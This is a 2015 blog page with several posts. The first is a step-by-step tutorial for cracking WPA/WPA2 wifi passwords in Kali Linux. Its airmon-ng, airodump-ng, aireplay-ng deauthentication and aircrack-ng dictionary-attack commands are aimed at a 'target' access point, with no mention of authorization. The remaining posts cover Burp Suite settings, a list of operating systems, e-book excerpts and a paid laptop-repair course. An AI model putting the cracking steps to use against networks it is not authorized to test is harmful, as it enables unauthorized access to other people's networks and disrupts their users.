Friday, March 6, 2015

How to Crack Wifi WPA WPA2 password in Kali Linux with Dictionary Attack


Requirements:
  • Kali Linux
  • Wifi Adapter
  • Wordlist
Note – If you are using Kali linux in VMware then you need external wifi adapter but if you are using Kali Linux along with Win7 or Win8 etc then you can use this method with your internal wifi.

1. Open Terminal
(Click image for large view)

2. Write arimon-ng and press Enter

3. Write airmon-ng start wlan0 and Press Enter after pressing enter you will see that your monitor mode enabled on mon0 as well there are some process running so we need to kill these process.

4. We are killing all process one by one with kill command

5. Write airodump-ng mon0 and Press Enter

6. Write airodump-ng –c 1 –w geekyshows –bssid E8:94:F6:01:0C:60 mon0
           Where 1 is our target CH, geekyshows is a file name you are write as per your favorite one and E8:94:F6:01:0C:60 is your target address.

7. Open new Terminal

8. Write aireplay-ng -0 0 –a E8:94:F6:01:0C:60 mon0 and press Enter (2nd/New terminal)

9. You will see WPA handshake : E8:94:F6:01:0C:60 in your 1st terminal. If you are not able to see this then there is something wrong with your process. Press ctrl + C in both terminal to stop handshake.

10. Close 1st terminal and write ls and Press Enter, in new terminal. It will show your file name which you have saved.


11. Write aircrack-ng –w /root/Desktop/wordlist.txt geekyshows-01.cap and Press Enter. After sometime you will find out the Key/Password of your target wifi.
(Click image for large view)

Now Our Tutorials are also available in Video. Just Click below Icon



Like it ? Share it.

Saturday, February 21, 2015

Connect External Wifi in Kali linux VMware


As we all know that we can’t connect wifi through internal wifi adapter if you are using Kali Linux in VM (Virtual machine). If you want to connect your wifi then you need an external wifi adapter so in this tutorial we will learn how can we connect an external wifi in Kali linux which is installed in VM.

Requirements:
  • Kali linux Installed in VM
  • External Wifi adapter
1. Install Driver and Software in your main System
(Click image for large view)

2. Turn on Your Kali Linux OS there you will find a small icon of your wireless device. Click on the wireless device icon then Click on Connect.

3. Now Click on Network Icon then Click on your available wifi network.

4. Write your wifi password and click on connect.


5. Wait for a while and you are connected. 
(Click image for large view)

Now our tutorials are available on Youtube. Just click below icon



Like it ? Share it.

Tuesday, February 10, 2015

Introduction Burp Suite Part IX (Option Tab)


Suite Options
 This tab contains settings to control how Burp handles platform authentication, upstream proxy servers, SOCKS proxy, timeouts, hostname resolution, and out-of-scope requests.

Platform Authentication
 These settings let you configure Burp to automatically carry out platform authentication to destination web servers. Different authentication types and credentials can be configured for individual hosts.
 Supported authentication types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.
The "Prompt for credentials on platform authentication failure" option causes Burp to display an interactive popup whenever an authentication failure is encountered.
(Click Image for large view)


Upstream Proxy Servers
 These settings control whether Burp will send outgoing requests to an upstream proxy server, or directly to the destination web server.
You can define multiple rules, specifying different proxy settings for different destination hosts, or groups of hosts. Rules are applied in sequence, and the first rule that matches the destination web server will be used. If no rule is matched, Burp defaults to direct, non-proxied connections.
You can use wildcards in the destination host specification (* matches zero or more characters, and ? matches any character except a dot). To send all traffic to a single proxy server, create a rule with * as the destination host. Leave the proxy host blank to connect directly to the specified host.
For each upstream proxy you configure, you can specify an authentication type and credentials if required. Supported authentication types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.

SOCKS Proxy
 These settings let you configure Burp to use a SOCKS proxy for all outgoing communications. This setting is applied at the TCP level, and all outbound requests will be sent via this proxy.
If you have configured rules for upstream HTTP proxy servers, then requests to upstream proxies will be sent via the SOCKS proxy configured here.
If the option "Do DNS lookups over SOCKS proxy" is enabled, then all domain names will be resolved by the proxy. No local lookups will be performed.

Timeouts
 These settings specify the timeouts to be used for various network tasks. You can specify the following timeouts:
Normal - This setting is used for most network communications, and determines how long Burp will wait before abandoning a request and record that a timeout has occurred.
Open-ended responses - This setting is only used where a response is being processed which does not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp waits for the specified interval before determining that the transmission has been completed.
Domain name resolution - This setting determines how often Burp will re-perform successful domain name look-ups. This should be set to a suitably low value if target host addresses are frequently changing.
Failed domain name resolution - This setting determines how often Burp will reattempt unsuccessful domain name look-ups.
Values are in seconds. If an option is left blank, then Burp will never time out that function.

Hostname Resolution
 These settings enable you to specify mappings of hostnames to IP addresses, to override the DNS resolution provided by your computer.
Each hostname resolution rule specifies a hostname, and the IP address that should be associated with that hostname. Rules can be individually enabled or disabled.
This feature can be useful to ensure correct onward forwarding of requests when the hosts file has been modified to perform invisible proxying of traffic from non-proxy-aware thick client components.

Out-of-Scope Requests
 This feature can be used to prevent Burp from issuing any out-of-scope requests. It can be useful when you need to guarantee that no requests are made to targets that are not in-scope for your current work. Even if your browser makes requests for out-of-scope items, the outgoing requests will be dropped by Burp.
You can enable this feature for the current Target scope. Alternatively, you can define a custom scope using URL-matching rules.
(Click Image for large view)



Like it ? Share it.

Friday, February 6, 2015

Top Ten Best Operating Systems


An operating system (OS) is software that manages computer hardware resources and provides common services for computer programs. The operating system is an essential component of the system software in a computer system. Application programs usually require an operating system to function.
 Time-sharing operating systems schedule tasks for efficient use of the system and may also include accounting software for cost allocation of processor time, mass storage, printing, and other resources.
Below are Best Operating System: 

Ubuntu
Ubuntu is a popular linux based distribution , developed by canonical corporations. Designed to work beautifully on the latest laptops, desktops and touch screen devices, it looks incredible on high resolution screens — and with touch screen enhancements and interface refinements including individual menu bars in each application window, it’s now even easier to use.

Windows 8.1
Windows 8.1 is a version of Windows NT family of operating systems and an upgrade for Windows 8. Windows 8.1 is available free of charge for retail copies of Windows 8 and Windows RT users via Windows Store. Unlike service packs on previous versions of Windows, users who obtained 8 outside of retail copies or pre-loaded installations must obtain 8.1 through new installation media from their respective subscription or enterprise channel.

Macintosh
The Macintosh, marketed as Mac, is a line of personal computers (PCs) designed, developed, and marketed by Apple Inc. It was initially targeted mainly at the home, education, and creative professional markets. Since the introduction of the Macintosh, the computer has seen significant evolution, now making it one of the most powerful general purpose computers on the market. It now targets the business, science, and law markets as well.

Windows 7
Windows 7 is a personal computer operating system developed by Microsoft, a version of Windows NT. Development of 7 occurred as early as 2006 under the codename "Blackcomb". Windows 7 was released to manufacturing on July 22, 2009, and became generally available on October 22, 2009, less than three years after the release of its predecessor, Windows Vista. Windows 7's server counterpart, Windows Server 2008 R2, was released at the same time.

Fedora
Fedora is an operating system based on the Linux kernel, developed by the community-supported Fedora Project and owned by Red Hat. Fedora contains software distributed under a free and open source license and aims to be on the leading edge of such technologies.

Linux Mint
Linux Mint is an Ubuntu-based distribution whose goal is to provide a more complete out-of-the-box experience by including browser plugins, media codecs, support for DVD playback, Java and other components. It also adds a custom desktop and menus, several unique configuration tools, and a web-based package installation interface. Linux Mint is compatible with Ubuntu software repositories.

Debian
Debian is an operating system composed of free software mostly carrying the GNU General Public License. The operating system is developed by an internet collaboration of volunteers aligned with The Debian Project.
Debian GNU/Linux is one of the most popular Linux distributions for personal computers and network servers

OpenSuse
openSUSE is a free and Linux-based operating system for your PC, Laptop or Server. openSUSE is a general purpose operating system built on top of the Linux kernel, developed by the community-supported openSUSE Project and sponsored by SUSE and a number of other companies. After Novell acquired SUSE Linux in January 2004, Novell decided to release the SUSE Linux Professional product as a 100% open source project.

Sun Solaris
Solaris is a Unix operating system originally developed by Sun Microsystems. It superseded their earlier SunOS in 1993. Solaris is known for its scalability, especially on SPARC systems, and for originating many innovative features such as DTrace, ZFS and Time Slider. Solaris supports SPARC-based and x86-based workstations and servers from Oracle and other vendors, with efforts underway to port to additional platforms. Solaris is registered as compliant with the Single Unix Specification.

Mandriva
Mandriva Linux was launched in 1998 under the name of Mandrake Linux, with the goal of making Linux easier to use for everyone. At that time, Linux was already well-known as a powerful and stable operating system that demanded strong technical knowledge and extensive use of the command line; MandrakeSoft saw this as an opportunity to integrate the best graphical desktop environments and contribute its own graphical configuration utilities to quickly become famous for setting the standard in Linux ease of use. In February 2005, MandrakeSoft merged with Brazil's Conectiva to form Mandriva S.A., with headquarters in Paris, France. The company's flagship product, Mandriva Linux, offers all the power and stability of Linux to both individuals and professional users in an easy-to-use and pleasant environment.



Like it ? Share it.

Friday, January 16, 2015

HTML in 10 Simple steps

Type: E-Book

Welcome to HTML in 10 Simple Steps or Less. Our mission in writing this book is to provide a quick and accessible way for you to learn Hypertext Markup Language — the lingua franca of the World Wide Web. We hope this book provides a resource that beginning and intermediate HTML coders can use to improve their Web development skills. It is also our hope that it fills multiple roles as both a teaching tool and a reference once you expand your skills.

What This Book Is
Each part in this book pertains to a different aspect of HTML and Web production, and we devote each task within the parts to building a specific piece of Web page content. We’ve laid out these tasks in 10 steps or less so they’re easy to internalize and become part of your personal skill set.

How to Use This Book
We think of this book as a multipurpose tool — perhaps the Swiss Army knife of HTML coding. Not
only can you employ it as a guide to creating individual pieces of Web page content, but you can also use this book as a valuable teaching tool. By working through the book’s tasks in sequence, you will learn the basics of Web page development — from constructing tags (the core components of Hypertext Markup Language) to publishing complete sites to a Web server.





Like it ? Share it.

Wednesday, January 7, 2015

Hackers Beginners Guide

Type: E-Book

"Computer hacker," is someone who lives and breathes computers, who knows all about computers, who can get a computer to do anything. Equally important, though, is the hacker's attitude. Computer programming must be a hobby, something done for fun, not out of a sense of duty or for the money. (It's okay to make money, but that can't be the reason for hacking.) In one sense it's silly to argue about the "true" meaning of a word. A word means whatever people use it to mean.
The concept of hacking entered the computer culture at the Mas-sachusetts Institute of Technology in the 1960s. Popular opinion at IT posited that there are two kinds of students, tools and hackers. A "tool" is someone who attends class regularly, is always to be found in the library when no class is meeting, and gets straight As. A "hacker" is the opposite: someone who never goes to class, who in fact sleeps all day, and who spends the night pursuing recreational activities rather than studying. There was thought to be no middle ground. What does this have to do with computers? Originally, nothing but there are standards for success as a hacker, just as grades form a standard for success as a tool. The true hacker can't just sit around all night; he must pursue some hobby with dedication and flair. It can be telephones, or railroads (model, real, or both), or science fiction fandom, or ham radio, or broadcast radio. It can be more than one of these. Or it can be computers, the word "hacker" is generally used among IT students to refer not to computer hackers but to building hackers, people who explore roofs and tunnels where they're not supposed to be.
There are specialties within computer hacking. An algorithm hacker knows all about the best algorithm for any problem. A system hacker knows about designing and maintaining operating systems. And a "password hacker" knows how to find out someone else's password. Someone who sets out to crack the security of a system for financial gain is not a hacker at all. It's not that a hacker can't be a thief, but a hacker can't be a professional thief. A hacker must be fundamentally an amateur, even though hackers can get paid for their expertise. A password hacker whose primary interest is in learning how the system works doesn't therefore necessarily refrain from stealing information or services, but someone whose primary interest is in stealing isn't a hacker.






Like it ? Share it.

Sunday, January 4, 2015

Complete Laptop Repair Training Video Tutorials

Language : English

This is a fully comprehensive instructional Video tutorials in getting into the business of repairing all makes of laptops. The fantastic train greater than 700 educational publications in PDF style and over 20 GB+ of video Tutorial training documents.

Price : Rs. 1999 + Postal Charge 
Size : 20 GB +
Format : HD Video + PDF Books

Laptop Repair Training include:

- Motherboard Replacement Procedure
- How to replace the LCD
- Laptop repair if a shutdown continued
- Repair the power supply.
- Training replace hinges
- Power Adapter Fix
- Training solder AC adapters
- Learn about Liquid Liquid LCD
- Training prevent overheating laptops
- Replacement of RAM, a DVD drive, hard drive and wireless cards
- And Much More…

How to Purchase :
1. Email Us With The Name of Video Tutorial. Ex - Complete Laptop Repair Training Video Tutorials
2. Mail Us Your Full Name, Postal Address and Mobile number.  
3. We will reply you back with our Bank Details as soon as possible.
4. After Depositing Cash at Bank. Please Attach Bank Receipt and Mail Us.
5. After Your Payment Verification we will send you your Video Tutorial by INDIAN SPEED POST and Tracking number will be send through SMS at your Mobile Number. You can Track Your Video Tutorial from http://www.indiapost.gov.in/tracking.aspx .
6. Maximum shipping Time - 7 Days. ( Depends on the Indian Speed Post Service)
7. Contact Us Click Here

Payment Mode:
1. Bank Deposit 
2. Paypal





Like it ? Share it.